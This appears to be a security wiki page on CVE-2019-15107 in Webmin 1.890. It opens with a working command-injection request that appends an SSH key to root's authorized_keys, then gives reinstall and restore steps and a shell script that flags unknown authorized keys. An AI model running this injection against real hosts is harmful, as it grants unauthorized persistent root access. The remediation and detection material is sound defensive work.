security:exploit:cve-2019-15107_webmin_1.890
Add SSH key to authorized_keys on Webmin host
COMMAND="echo '$(cat ~/.ssh/id_rsa.pub)' >> /root/.ssh/authorized_keys"
PAYLOAD="echo%20$(echo "$COMMAND" | base64 -w 0)|base64%20-d|sh"
curl -ks "http://<HOST>:10000/password_change.cgi" -d "user=root&pam=&expired=2;$PAYLOAD&old=foobar&new1=foobar1&new2=foobar1" -H "Referer: http://<HOST>:10000"
Patch/reinstall Webmin
https://www.webmin.com/deb.html
# Line to add to /etc/apt/sources.list:
deb https://download.webmin.com/download/repository sarge contrib
# Import the repository signing key, then install Webmin:
wget https://download.webmin.com/jcameron-key.asc
apt-key add jcameron-key.asc
apt-get install apt-transport-https
apt-get update
apt-get install webmin
Restore
Restore /var/www/html/* from backup
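Reinstalling Webmin and restoring /var/www/html do not touch /root/.ssh/authorized_keys, so a key appended as in the first section stays in place. The following check is an added example, not part of the original page: it lists keys in an authorized_keys file that are missing from a known-good allowlist. The allowlist file and the function names key_blobs and unknown_keys are assumptions.

```shell
#!/bin/sh
# Added example (not from the original page).
# Hypothetical usage: unknown_keys /root/.ssh/authorized_keys /path/to/known_good_keys

# Print "<type> <blob>" for every key line in file $1.
# Handles a leading options field (e.g. command="...",no-pty) by scanning
# for the first field that is exactly a known public key type.
key_blobs() {
    awk '
        NF == 0 || $1 ~ /^#/ { next }   # skip blank lines and comments
        {
            for (i = 1; i < NF; i++)
                if ($i ~ /^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp(256|384|521)|sk-ssh-ed25519@openssh\.com|sk-ecdsa-sha2-nistp256@openssh\.com)$/) {
                    print $i, $(i + 1)
                    next
                }
        }
    ' "$1"
}

# Print keys present in $1 (authorized_keys) but absent from $2 (allowlist).
# Comparison is on the base64 key blob, so a changed comment or added
# options cannot hide a key. Returns 1 if any unknown key is found.
unknown_keys() {
    allowed=$(key_blobs "$2" | awk '{ print $2 }')
    found=$(key_blobs "$1" | while read -r ktype blob; do
        printf '%s\n' "$allowed" | grep -qxF -- "$blob" ||
            printf '%s %s\n' "$ktype" "$blob"
    done)
    [ -z "$found" ] && return 0
    printf '%s\n' "$found"
    return 1
}
```

Any key it prints should be removed from authorized_keys, and the account's SSH login history reviewed, before the host is returned to service.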
security/exploit/cve-2019-15107_webmin_1.890.txt · Last modified: by rsi
